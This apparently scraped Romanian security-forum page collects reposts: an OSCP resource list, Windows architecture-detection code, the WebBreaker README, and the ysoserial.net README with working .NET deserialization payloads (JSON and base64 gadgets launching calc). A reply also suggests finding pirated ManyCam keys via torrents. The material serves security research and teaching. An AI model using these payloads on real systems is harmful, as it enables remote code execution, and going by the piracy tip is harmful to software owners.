Leaderboard

Salutare, Vreau sa fac share la un playlist pe care l-am urmarit in ultima vreme, legat de bug bounty hunting. Recomand atat incepatorilor cat si celor cu exprienta, pentru ca oricand se poate invatat ceva nou, sau pot aparea alte idei. Peter Yaworski, autorul cartii Web Hacking 101(o "culegere" cu cele mai intalnite tipuri de vunerabilitati explicate mai pe scurt, insotite de exemple descoperite "in the wild" in ultimii ani), face o serie de interviuri cu unii dintre cei mai buni bug bounty hunters la ora actuala, regasiti in topul HackerOne sau Bugcrowd. In aceste interviuri aflam cum a inceput fiecare, ce metode si procedee folosesc, si multe altele. Fiecare interviu e diferit, fiecare invitat are stilul si modalitatile lui, asa ca sunt multe lucruri de invatat. Avand in vedere ca majoritatea tintelor pe care le abordeaza au deja o echipa de securitate in spate care gasesc majoritatea problemelor, abilitatea de a construi atacuri creative si "outside the box" e esentiala pentru a gasi probleme critice in sisteme. Playlist-ul aici:

https://github.com/evilsocket/bleah via https://www.evilsocket.net/2017/09/23/This-is-not-a-post-about-BLE-introducing-BLEAH/

OSCP Certification by ciaranmcnally Given I have been working in information security for the past few years, I became well aware of the different certifications available as a means of professional development. The certification that stood out as gaining the most respect from the security community seemed to be the “(OSCP) Offensive Security Certified Professional” certificate, I witnessed this time and time again in conversations online. The reason often given is that it is a tough 24 hour practical exam vs a multiple choice questionnaire like many other security certificates. The OSCP is also listed regularly as a desirable requirement for many different kinds of infosec engineering jobs. I recently received confirmation that I have successfully achieved this certification. To anyone interested in pursuing the OSCP, I would completely encourage it. There is no way you can come away from this experience without adding a few new tricks or tools to your security skills arsenal and aside from all of that, it’s also very fun. This certificate will demonstrate to clients or to any potential employer that you have a good wide understanding of penetration testing with a practical skill-set to back up the knowledge. I wanted to get this as I’ve had clients in the past not follow up on using my services due to me not having any official security certificates (especially CREST craving UK based customers). Hopefully this opens up some doors to new customers. Before undertaking this course I already had a lot of experience performing vulnerability assessments and penetrations tests, I also had a few CVEs under my belt and have been quite active in the wider information security community by creating tools, taking part in bug bounties and being a fan of responsible disclosure in general. I found the challenge presented by this exam to be quite humbling and very much a worthwhile engagement. I would describe the hacking with kali course materials and videos as very entry-level friendly which is perfect for someone with a keen interest looking to learn the basics of penetration testing. The most valuable part of the course for those already familiar with the basics is the interactive lab environment, this is an amazing experience and it’s hard not to get excited thinking about it. There were moments of frustration and teeth-grinding but it was a very enjoyable way to sharpen skills and try out new techniques or tools. I signed up for the course initially a full year ago while working full time on contracts and found it extremely difficult to find the time to work on the labs as I had multiple ongoing projects and was doing bug bounties quite actively too. I burnt out fairly quick and didn’t concentrate on it at all. I did one or two of the “known to be hard” machines in the labs fairly easily which convinced me I was ready and sat the exam having compromised less than 10 of the lab hosts. This was of course silly and I only managed 2 roots and one local access shell which wasn’t near enough points to pass and very much dulled my arrogance at the time. I didn’t submit an exam report and decided to focus on my contracts and dedicate my time to the labs properly at a later date. Fast forward over a year later to the start of this month (September) and I had 2 weeks free that I couldn’t get contract work for. So I purchased a lab extension with the full intention of dedicating my time completely to obtaining this certificate. In the two weeks I got around 20 or so lab machines and set the date for my first real exam attempt. This went well but I didn’t quite make it over the line. I rooted 3 machines and fell short of privilege escalating on a 4th windows host. I was so close and possibly could have passed if I did the lab report and exercises, however this time around I wasn’t upset by the failure and became more determined than ever to keep trying. I booked another 2 weeks in the labs, focused on machines with manual windows privilege escalation and booked my next exam sitting, successfully nailing it. As I had learned a lot of penetration testing skills doing bug bounties, I found that it was very easy to identify and gain remote access to the lab machines, I usually gained remote shell access within the first 20 or 30 minutes for the large majority of the attempted targets. I very quickly found out that my weakest area was local privilege escalation. During my contract engagements, it is a regular occurrence that my clients request I don’t elevate any further with a remote code execution issue on a live production environment. This activity is also greatly discouraged in bug bounties so I can very much see why I didn’t have much skill in this area. The OSCP lab environment taught me a large amount of techniques and different ways of accomplishing this. I feel I have massively skilled up with regard to privilege escalation on Linux or Windows hosts. I’m very happy to join the ranks of the (OSCP) Offensive Security Certified Professionals and would like to thank anyone who helped me on this journey by providing me with links to quality material produced by the finest of hackers. Keeping the hacker knowledge sharing mantra in mind, below is a categorized list of very useful resources I have used during my journey to achieving certification. I hope these help you to overcome many obstacles by trying harder! Mixed https://www.nop.cat/nmapscans/ https://github.com/1N3/PrivEsc https://github.com/xapax/oscp/blob/master/linux-template.md https://github.com/xapax/oscp/blob/master/windows-template.md https://github.com/slyth11907/Cheatsheets https://github.com/erik1o6/oscp/ https://backdoorshell.gitbooks.io/oscp-useful-links/content/ https://highon.coffee/blog/lord-of-the-root-walkthrough/ MsfVenom https://www.offensive-security.com/metasploit-unleashed/msfvenom/ https://netsec.ws/?p=331 Shell Escape Techniques https://netsec.ws/?p=337 https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells https://airnesstheman.blogspot.ca/2011/05/breaking-out-of-jail-restricted-shell.html https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells Pivoting http://www.fuzzysecurity.com/tutorials/13.html http://exploit.co.il/networking/ssh-tunneling/ https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117 https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/ https://www.offensive-security.com/metasploit-unleashed/portfwd/ Linux Privilege Escalation https://0x90909090.blogspot.ie/2015/07/no-one-expect-command-execution.html https://resources.infosecinstitute.com/privilege-escalation-linux-live-examples/\#gref https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ https://github.com/mzet-/linux-exploit-suggester https://github.com/SecWiki/linux-kernel-exploits https://highon.coffee/blog/linux-commands-cheat-sheet/ https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt https://github.com/lucyoa/kernel-exploits https://www.rebootuser.com/?p=1758 https://www.securitysift.com/download/linuxprivchecker.py https://www.youtube.com/watch?v=dk2wsyFiosg https://www.youtube.com/watch?v=2NMB-pfCHT8https://www.youtube.com/watch?v=1A7yJxh-fyc https://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know/ https://github.com/foxglovesec/RottenPotato https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py https://github.com/pentestmonkey/windows-privesc-check https://github.com/PowerShellMafia/PowerSploit https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/ATT%26CK-Stuff/Windows/Windows_Privilege_Escalation.md https://github.com/SecWiki/windows-kernel-exploits https://hackmag.com/security/elevating-privileges-to-administrative-and-further/ https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ https://toshellandback.com/2015/11/24/ms-priv-esc/ https://www.gracefulsecurity.com/privesc-unquoted-service-path/ https://www.commonexploits.com/unquoted-service-paths/ https://www.exploit-db.com/dll-hijacking-vulnerable-applications/ https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be Sursa: https://securit.ie/blog/?p=70

September 24, 2017 Detecting Architecture in Windows Leave a comment After a while I thought of posting something interesting I noticed. Some of you know this old method of detecting the architecture using the CS segment register. This was also used in the Kronos malware 1 2 3 xor eax,eax mov ax,cs shr eax,5 I had a look at the segment registers last night and I found out that we can use ES, GS and FS segment registers for detecting the architecture as well. Using ES 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax,eax mov ax,es ror ax, 0x3 and eax,0x1 test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 Using GS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, gs test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main Using TEB Apart from that, you can also use TEB + 0xc0 entry which is ‘WOW32Reserved’. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ; Author : @OsandaMalith main: xor eax, eax mov eax, [FS:0xc0] test eax, eax je thirtytwo invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION jmp exit thirtytwo: invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION exit: invoke ExitProcess, 0 .end main I included all in one and coded a small C application. I’m sure there might be many other tricks to detect the architecture. This might come handy in shellcoding #include <Windows.h> #include <wchar.h> /* * Author: Osanda Malith Jayathissa - @OsandaMalith * Website: https://osandamalith.com * Description: Few tricks that you can use to detect the architecture in Windows * Link : http://osandamalith.com/2017/09/24/detecting-architecture-in-windows/ */ BOOL detectArch_ES() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, es ror ax, 0x3 and eax, 0x1 } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, es;" "ror ax, 0x3;" "and eax, 0x1;" ); #endif } BOOL detectArch_GS() { #if defined(_MSC_VER) _asm { xor eax, eax mov ax, gs } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov ax, gs;" ); #endif } BOOL detectArch_TEB() { #if defined(_MSC_VER) _asm { xor eax, eax mov eax, fs:[0xc0] } #elif defined(__GNUC__) asm( ".intel_syntax noprefix;" "xor eax, eax;" "mov eax, fs:[0xc0];" ); #endif } int main(int argc, char* argv[]) { wprintf( !detectArch_ES() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_GS() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); wprintf( !detectArch_TEB() ? L"You are Running 32-bit\n" : L"You are Running 64-bit\n" ); return 1337; } view raw detectArch.c hosted with by GitHub Sursa: https://osandamalith.com/2017/09/24/detecting-architecture-in-windows/

Screenshots Description IMPORTANT: This app works with Windows 10 Pro and Home but not with Windows 10 S. We've updated WinDbg to have more modern visuals, faster windows, a full-fledged scripting experience, and Time Travel Debugging, all with the easily extensible debugger data model front and center. WinDbg Preview is using the same underlying engine as WinDbg today, so all the commands, extensions, and workflows you're used to will still work as they did before. See http://aka.ms/windbgblog and https://go.microsoft.com/fwlink/p/?linkid=854349 for more information! Sursa: https://www.microsoft.com/en-us/store/p/windbg-preview/9pgjgd53tn86

Introduction Build functional security testing, into your software development and release cycles! WebBreaker provides the capabilities to automate and centrally manage Dynamic Application Security Testing (DAST) as part of your DevOps pipeline. WebBreaker truly enables all members of the Software Security Development Life-Cycle (SDLC), with access to security testing, greater test coverage with increased visibility by providing Dynamic Application Security Test Orchestration (DASTO). Current support is limited to the World's most popular commercial DAST product, WebInspect. System Architecture Supported Features Command-line (CLI) scan administration of WebInspect with Foritfy SSC products. Jenkins Environmental Variable & String Parameter support (i.e. $BUILD_TAG) Docker container v17.x support Custom email alerting or notifications for scan launch and completion. Extensible event logging for scan administration and results. WebInspect REST API support for v9.30 and later. Fortify Software Security Center (SSC) REST API support for v16.10 and later. WebInspect scan cluster support between two (2) or greater WebInspect servers/sensors. Capabilities for extensible scan telemetry with ELK and Splunk. GIT support for centrally managing WebInspect scan configurations. Replaces most functionality of Fortify's fortifyclient Python compatibility with versions 2.x or 3.x Provides AES 128-bit key management for all secrets from the Fernet encryption Python library. Quick Local Installation and Configurations Installing WebBreaker from source: git clone https://github.com/target/webbreaker pip install -r requirements.txt python setup.py install Configuring WebBreaker: Point WebBreaker to your WebInspect API server(s) by editing: webbreaker/etc/webinspect.ini Point WebBreaker to your Fortify SSC URL by editing: webbreaker/etc/fortify.ini SMTP settings on email notifications and a message template can be edited in webbreaker/etc/email.ini Mutually exclusive remote GIT repos created by users, are encouraged to persist WebInspect settings, policies, and webmacros. Simply, add the GIT URL to the webinspect.ini and their respective directories. NOTES: Required: As with any Python application that contains library dependencies, pip is required for installation. Optional: Include your Python site-packages, if they are not already in your $PATH with export PATH=$PATH:$PYTHONPATH. Usage WebBreaker is a command-line interface (CLI) client. See our complete WebBreaker Documentation for further configuration, usage, and installation. The CLI supports upper-level and lower-level commands with respective options to enable interaction with Dynamic Application Security Test (DAST) products. Currently, the two Products supported are WebInspect and Fortfiy (more to come in the future!!) Below is a Cheatsheet of supported commands to get you started. List all WebInspect scans: webbreaker webinspect list --server webinspect-1.example.com:8083 Query WebInspect scans: webbreaker webinspect list --server webinspect-1.example.com:8083 --scan_name important_site List with http: webbreaker webinspect list --server webinspect-1.example.com:8083 --protocol http Download WebInspect scan from server or sensor: webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth Download WebInspect scan as XML: webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth -x xml Download WebInspect scan with http (no SSL): webbreaker webinspect download --server webinspect-2.example.com:8083 --scan_name important_site_auth --protocol http Basic WebInspect scan: webbreaker webinspect scan --settings important_site_auth Advanced WebInspect Scan with Scan overrides: webbreaker webinspect scan --settings important_site_auth --allowed_hosts example.com --allowed_hosts m.example.com Scan with local WebInspect settings: webbreaker webinspect scan --settings /Users/Matt/Documents/important_site_auth Initial Fortify SSC listing with authentication (SSC token is managed for 1-day): webbreaker fortify list --fortify_user matt --fortify_password abc123 Interactive Listing of all Fortify SSC application versions: webbreaker fortify list List Fortify SSC versions by application (case sensitive): webbreaker fortify list --application WEBINSPECT Upload to Fortify SSC with command-line authentication: webbreaker fortify upload --fortify_user $FORT_USER --fortify_password $FORT_PASS --version important_site_auth Upload to Fortify SSC with interactive authentication & application version configured with fortify.ini: webbreaker fortify upload --version important_site_auth --scan_name auth_scan Upload to Fortify SSC with application/project & version name: webbreaker fortify upload --application my_other_app --version important_site_auth --scan_name auth_scan WebBreaker Console Output webbreaker webinspect scan --settings MyCustomWebInspectSetting --scan_policy Application --scan_name some_scan_name _ __ __ ____ __ | | / /__ / /_ / __ )________ ____ _/ /_____ _____ | | /| / / _ \/ __ \/ __ / ___/ _ \/ __ `/ //_/ _ \/ ___/ | |/ |/ / __/ /_/ / /_/ / / / __/ /_/ / ,< / __/ / |__/|__/\___/_.___/_____/_/ \___/\__,_/_/|_|\___/_/ Version 1.2.0 JIT Scheduler has selected endpoint https://some.webinspect.server.com:8083. WebInspect scan launched on https://some.webinspect.server.com:8083 your scan id: ec72be39-a8fa-46b2-ba79-10adb52f8adb !! Scan results file is available: some_scan_name.fpr Scan has finished. Webbreaker complete. Bugs and Feature Requests Found something that doesn't seem right or have a feature request? Please open a new issue. Copyright and License Copyright 2017 Target Brands, Inc. Licensed under MIT. Sursa: https://github.com/target/webbreaker

ysoserial.net A proof-of-concept tool for generating payloads that exploit unsafe .NET object deserialization. Description ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host. It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath. This project is inspired by Chris Frohoff's ysoserial project Disclaimer This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. This software is a personal project and not related with any companies, including Project owner and contributors employers. Usage $ ./ysoserial -h ysoserial.net generates deserialization payloads for a variety of .NET formatters. Available formatters: ActivitySurrogateSelector (ActivitySurrogateSelector gadget by James Forshaw. This gadget ignores the command parameter and executes the constructor of ExploitClass class.) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter LosFormatter ObjectDataProvider (ObjectDataProvider Gadget by Oleksandr Mirosh and Alvaro Munoz) Formatters: Json.Net FastJson JavaScriptSerializer PSObject (PSObject Gadget by Oleksandr Mirosh and Alvaro Munoz. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017)) Formatters: BinaryFormatter ObjectStateFormatter SoapFormatter NetDataContractSerializer LosFormatter TypeConfuseDelegate (TypeConfuseDelegate gadget by James Forshaw) Formatters: BinaryFormatter ObjectStateFormatter NetDataContractSerializer LosFormatter Usage: ysoserial.exe [options] Options: -o, --output=VALUE the output format (raw|base64). -g, --gadget=VALUE the gadget chain. -f, --formatter=VALUE the formatter. -c, --command=VALUE the command to be executed. -t, --test whether to run payload locally. Default: false -h, --help show this message and exit Examples $ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd','/ccalc'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLCBWZXJzaW9uPTMuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUBAAAAJVN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QBAAAABkNsaVhtbAECAAAABgMAAACJFQ0KPE9ianMgVmVyc2lvbj0iMS4xLjAuMSIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vcG93ZXJzaGVsbC8yMDA0LzA0Ij4mI3hEOw0KPE9iaiBSZWZJZD0iMCI+JiN4RDsNCiAgICA8VE4gUmVmSWQ9IjAiPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZSNTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uL1J1bnNwYWNlSW52b2tlNTwvVD4mI3hEOw0KICAgICAgPFQ+TWljcm9zb2Z0Lk1hbmFnZW1lbnQuSW5mcmFzdHJ1Y3R1cmUuQ2ltSW5zdGFuY2UjUnVuc3BhY2VJbnZva2U1PC9UPiYjeEQ7DQogICAgICA8VD5NaWNyb3NvZnQuTWFuYWdlbWVudC5JbmZyYXN0cnVjdHVyZS5DaW1JbnN0YW5jZTwvVD4mI3hEOw0KICAgICAgPFQ+U3lzdGVtLk9iamVjdDwvVD4mI3hEOw0KICAgIDwvVE4+JiN4RDsNCiAgICA8VG9TdHJpbmc+UnVuc3BhY2VJbnZva2U1PC9Ub1N0cmluZz4mI3hEOw0KICAgIDxPYmogUmVmSWQ9IjEiPiYjeEQ7DQogICAgICA8VE5SZWYgUmVmSWQ9IjAiIC8+JiN4RDsNCiAgICAgIDxUb1N0cmluZz5SdW5zcGFjZUludm9rZTU8L1RvU3RyaW5nPiYjeEQ7DQogICAgICA8UHJvcHM+JiN4RDsNCiAgICAgICAgPE5pbCBOPSJQU0NvbXB1dGVyTmFtZSIgLz4mI3hEOw0KCQk8T2JqIE49InRlc3QxIiBSZWZJZCA9IjIwIiA+ICYjeEQ7DQogICAgICAgICAgPFROIFJlZklkPSIxIiA+ICYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uV2luZG93cy5NYXJrdXAuWGFtbFJlYWRlcltdLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1PC9UPiYjeEQ7DQogICAgICAgICAgICA8VD5TeXN0ZW0uQXJyYXk8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPFMgTj0iSGFzaCIgPiAgDQoJCSZsdDtSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSImZ3Q7DQoJICZsdDtPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IkxhdW5jaENhbGMiIE9iamVjdFR5cGUgPSAieyB4OlR5cGUgRGlhZzpQcm9jZXNzfSIgTWV0aG9kTmFtZSA9ICJTdGFydCIgJmd0Ow0KICAgICAmbHQ7T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnMmZ3Q7DQogICAgICAgICZsdDtTeXN0ZW06U3RyaW5nJmd0O2NtZCZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgICAgJmx0O1N5c3RlbTpTdHJpbmcmZ3Q7L2MgImNhbGMiICZsdDsvU3lzdGVtOlN0cmluZyZndDsNCiAgICAgJmx0Oy9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycyZndDsNCiAgICAmbHQ7L09iamVjdERhdGFQcm92aWRlciZndDsNCiZsdDsvUmVzb3VyY2VEaWN0aW9uYXJ5Jmd0Ow0KCQkJPC9TPiYjeEQ7DQogICAgICAgICAgPC9MU1Q+JiN4RDsNCiAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgIDwvUHJvcHM+JiN4RDsNCiAgICAgIDxNUz4mI3hEOw0KICAgICAgICA8T2JqIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIj4gJiN4RDsNCiAgICAgICAgICA8VE4gUmVmSWQ9IjEiID4gJiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5Db2xsZWN0aW9ucy5BcnJheUxpc3Q8L1Q+JiN4RDsNCiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+JiN4RDsNCiAgICAgICAgICA8L1ROPiYjeEQ7DQogICAgICAgICAgPExTVD4mI3hEOw0KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+ICYjeEQ7DQogICAgICAgICAgICAgIDxNUz4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49IkNsYXNzTmFtZSI+UnVuc3BhY2VJbnZva2U1PC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPFMgTj0iTmFtZXNwYWNlIj5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uPC9TPiYjeEQ7DQogICAgICAgICAgICAgICAgPE5pbCBOPSJTZXJ2ZXJOYW1lIiAvPiYjeEQ7DQogICAgICAgICAgICAgICAgPEkzMiBOPSJIYXNoIj40NjA5MjkxOTI8L0kzMj4mI3hEOw0KICAgICAgICAgICAgICAgIDxTIE49Ik1pWG1sIj4gJmx0O0NMQVNTIE5BTUU9IlJ1bnNwYWNlSW52b2tlNSIgJmd0OyZsdDtQUk9QRVJUWSBOQU1FPSJ0ZXN0MSIgVFlQRSA9InN0cmluZyIgJmd0OyZsdDsvUFJPUEVSVFkmZ3Q7Jmx0Oy9DTEFTUyZndDs8L1M+JiN4RDsNCiAgICAgICAgICAgICAgPC9NUz4mI3hEOw0KICAgICAgICAgICAgPC9PYmo+JiN4RDsNCiAgICAgICAgICA8L0xTVD4mI3hEOw0KICAgICAgICA8L09iaj4mI3hEOw0KICAgICAgPC9NUz4mI3hEOw0KICAgIDwvT2JqPiYjeEQ7DQogICAgPE1TPiYjeEQ7DQogICAgICA8UmVmIE49Il9fQ2xhc3NNZXRhZGF0YSIgUmVmSWQgPSIyIiAvPiYjeEQ7DQogICAgPC9NUz4mI3hEOw0KICA8L09iaj4mI3hEOw0KPC9PYmpzPgs= Contributing Fork it Create your feature branch (git checkout -b my-new-feature) Commit your changes (git commit -am 'Add some feature') Push to the branch (git push origin my-new-feature) Create new Pull Request Additional Reading Are you my Type? Friday the 13th: JSON Attacks - Slides Friday the 13th: JSON Attacks - Whitepaper Exploiting .NET Managed DCOM Sursa: https://github.com/pwntester/ysoserial.net

https://www.steganos.com/specials/cobi1617/sos

thank you verry much

Încearcă https://obsproject.com/. L-am folosit prin martie pentru livestream pe YT și a mers super ok. Merge pe Win, Mac și Linux. Poți să setezi o ieșire de cameră în care să fie ce vrei tu, camera proprie, o imagine, un video și la fel și pentru sunet.

ManyCam 4.0.52 - versunile vechi, cauta pe uptodown.com

exista pe net, am avut nevoie acum 2 luni, doar ca trebuie sa cauti versiuni mai vechi la care gasesti key. Nu mai tin minte numele la program. Cauta pe torrente

Nivel 0: https://cs50.harvard.edu/weeks - Asm & Api: Limbaj de Asamblare (Assembler) Intel 8086 Windows Assembly Language Megaprimer Iczelion's Win32 Assembly Silences Programming Tour with MASM32 Intel Pentium Instruction Set Reference Functii Api - MSDN Library Undocumented Functions Reverse engineering: TiGa's Video Tutorial Series on IDA Pro Lenas Reversing for Newbies IDA Pro Binary Auditing Training R4ndom’s Beginning Reverse Engineering Ricardo Narvaja Tutorials [introduction to cracking with Olly from zero] https://drive.google.com/drive/folders/0B13TW0I0f8O2ckd2T0lsbXRoYmc Reversing with IDA PRO from scratch Kani Cracking tutorials https://rstforums.com/forum/topic/106449-nsa-capstone-course-reverse-engineering/ NSA Capstone Course - Reverse Engineering Analiza malware: Dr. Fu's Malware Analysis Tutorials F-Secure Malware Analysis Course Reversing & Malware Analysis Training, Advanced Malware Analysis Training https://github.com/RPISEC/Malware Malware Analysis at Rensselaer Polytechnic Institute Exploits/shellcode: Corelan Exploit writing tutorial Neox Training Center Exploit Research Megaprimer Fuzzy security - Exploit Development Tutorial Shellcode Tutorials Memory forensics: Introduction to Volatility Scripting: Google's Python Class Open Security Training Training -un site ce isi merita propria categorie Tools: RCE tool library Diverse: Goppit PE file format Cheat sheets: quickly code, quick reference Online automated malware analysis: Malwr (Windows executable, PDF) https://www.hybrid-analysis.com/ https://any.run/ ThreatExpert (Windows executable) CWSandbox (Windows executable) JSUNPACK (PDF, pcap, HTML, or JavaScript) malware tracker (Shellcode Analysis, PDF, Doc ) Document Analyzer (.pdf, .doc, .ppt, .xls, .docx, .pptx, .xlsx, .rtf) Mobile Sandbox (APK Analysis) https://detux.org/index.php (Linux Sandbox x86, x86-64, ARM, MIPS and MIPSEL) SandDroid (APK Analysis Sandbox) https://linux.huntingmalware.com/#